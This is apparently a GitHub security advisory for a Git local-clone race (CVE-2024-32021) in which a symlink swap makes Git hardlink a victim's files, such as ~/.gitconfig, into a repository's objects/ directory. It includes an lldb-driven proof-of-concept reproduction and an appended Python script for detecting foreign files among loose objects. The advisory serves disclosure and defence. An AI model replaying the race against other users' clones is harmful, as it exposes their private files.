Local clone may hardlink arbitrary user-readable files into the new repository's "objects/" directory

Low
dscho published GHSA-mvxm-9j2h-qjx7 May 14, 2024

Package

git

Affected versions

v2.45.0 v2.44.0 <=v2.43.3 <=v2.42.1 v2.41.0 <=v2.40.1 <=v2.39.3

Patched versions

v2.45.1 v2.44.1 v2.43.4 v2.42.2 v2.41.1 v2.40.2 v2.39.4

Description

Summary

When cloning a local source repository over the filesystem, and that
repository contains symlinks, Git may create hardlinks in the new
repository's objects/ directory to arbitrary user-readable files on the
same filesystem as the target repository.

Details

Cloning a local repository over the filesystem may create hardlinks to
arbitrary user-owned files on the same filesystem in the target Git
repository's objects/ directory.

When cloning a repository over the filesystem (without explicitly specifying
the file:// protocol or --no-local), the optimizations for local cloning
will be used, which include attempting to hard link the object files instead of
copying them.

While the code includes checks against symbolic links in the source repository,
which were added during the fix for CVE-2022-39253, these checks can still be
raced, because the hard link operation that follows the check ultimately
follows symlinks. If the object on the filesystem appears as a regular file
during the check and has been replaced by a symlink by the time the link is
created, an adversary can bypass the check and create hardlinks in the
destination objects/ directory to arbitrary user-readable files.

PoC

Since the code will stop attempting to create hard links after the first
failure, it is easiest to reproduce against a repository with just a single object.

  1. Create a repository with an object:
```
mkdir simplerepo
cd simplerepo
git init
echo 'bla' | git hash-object -w --stdin
cd ..
git clone simplerepo --bare
```
  2. Debug the cloning of that repository over an NFS mount, and break
     on link:
```
% lldb -- $GITBINARY clone /tmp/mount/simplerepo.git cloned
(lldb) b --one-shot true --name link
(lldb) r
...
(lldb) p (char*)$x0
(char *) 0x00006000034c0180 "/private/tmp/mount/simplerepo.git/objects/a7/f8d9e5dcf
(lldb) p (char*)$x1
(char *) 0x00006000034c0100 "cloned/.git/objects/a7/f8d9e5dcf3a68fdd2bfb727cde12029
```
  3. From the NFS server, replace the file in the source repository with
     a symbolic link to any of the victim's files on the same mount
     point they are cloning to:
```
% rm -f objects/a7/f8d9e5dcf3a68fdd2bfb727cde12029875260b
% ln -s /Users/certl/.gitconfig objects/a7/f8d9e5dcf3a68fdd2bfb727cde12029875260b
```
  4. Continue the clone, observing afterwards as the victim that the
     .git/objects/a7/f8d9e5dcf3a68fdd2bfb727cde12029875260b file is a
     hard link to the location specified in the symlink created by
     the attacker in the previous step:
```
(lldb) c
(lldb) q
% ls -i cloned/.git/objects/a7/f8d9e5dcf3a68fdd2bfb727cde12029875260b
31241553 cloned/.git/objects/a7/f8d9e5dcf3a68fdd2bfb727cde12029875260b
% ls -i /Users/certl/.gitconfig
31241553 /Users/certl/.gitconfig
```

Impact

An adversary can cause the user to hardlink arbitrary files into their
repository's objects/ directory.
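As an added defender-side check (example code, not part of this advisory or of Git itself), the following Python walks a repository's loose objects and flags any file under objects/XX/ that is not a zlib-compressed object hashing to its own name, which is exactly what a foreign file such as the hardlinked .gitconfig from the PoC looks like. The fixture built in demo() is constructed; the object name of the foreign file is a placeholder, and a link count of 2 is normal for objects of a legitimate local clone, so nlink alone is not evidence.

```python
import hashlib
import os
import tempfile
import zlib
from pathlib import Path

DIGESTS = {38: "sha1", 62: "sha256"}  # object file-name length -> repo hash format

def write_loose_object(git_dir, content, obj_type="blob"):
    """Write a genuine loose object the way Git does and return its hex id."""
    store = f"{obj_type} {len(content)}\0".encode() + content
    oid = hashlib.sha1(store).hexdigest()
    path = Path(git_dir, "objects", oid[:2], oid[2:])
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_bytes(zlib.compress(store))
    return oid

def verify_loose_objects(git_dir):
    """Return (path, reason) for each file under objects/XX/ that is not a zlib
    stream whose decompressed content hashes to its own name."""
    findings = []
    for fan_out in sorted(Path(git_dir, "objects").iterdir()):
        if not (fan_out.is_dir() and len(fan_out.name) == 2):
            continue  # info/ and pack/ hold no loose objects
        for obj in sorted(fan_out.iterdir()):
            rel, st = f"{fan_out.name}/{obj.name}", obj.lstat()
            if obj.is_symlink():
                findings.append((rel, "symlink inside objects/"))
                continue
            try:
                data = zlib.decompress(obj.read_bytes())
            except zlib.error:  # e.g. a hardlinked ~/.gitconfig: plain text, not an object
                findings.append((rel, f"not a zlib stream (nlink={st.st_nlink})"))
                continue
            algo = DIGESTS.get(len(obj.name))
            if algo is None or hashlib.new(algo, data).hexdigest() != fan_out.name + obj.name:
                findings.append((rel, f"content does not hash to its name (nlink={st.st_nlink})"))
    return findings

def demo():
    """Constructed fixture: a clean repository, then a foreign file hardlinked into objects/."""
    git_dir = Path(tempfile.mkdtemp(), ".git")
    write_loose_object(git_dir, b"bla\n")
    before = verify_loose_objects(git_dir)
    victim = git_dir.parent / "gitconfig"  # stands in for the victim's ~/.gitconfig
    victim.write_text("[user]\n\tname = victim\n")
    bogus = git_dir / "objects" / "a7" / ("f" * 38)  # placeholder, not a real object id
    bogus.parent.mkdir(exist_ok=True)
    os.link(victim, bogus)  # the end state the raced clone in the PoC produces
    return {"before": before, "after": verify_loose_objects(git_dir)}
```

`git fsck` performs the same content-to-name verification on a real repository; the script above only shows what that check catches in this scenario.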

This issue was originally reported by Apple Security Engineering and Architecture (SEAR).

Severity

Low
3.9 / 10

CVSS base metrics

Attack vector
Local
Attack complexity
High
Privileges required
Low
User interaction
Required
Scope
Changed
Confidentiality
None
Integrity
Low
Availability
Low
CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:L

CVE ID

CVE-2024-32021

Weaknesses

No CWEs

Credits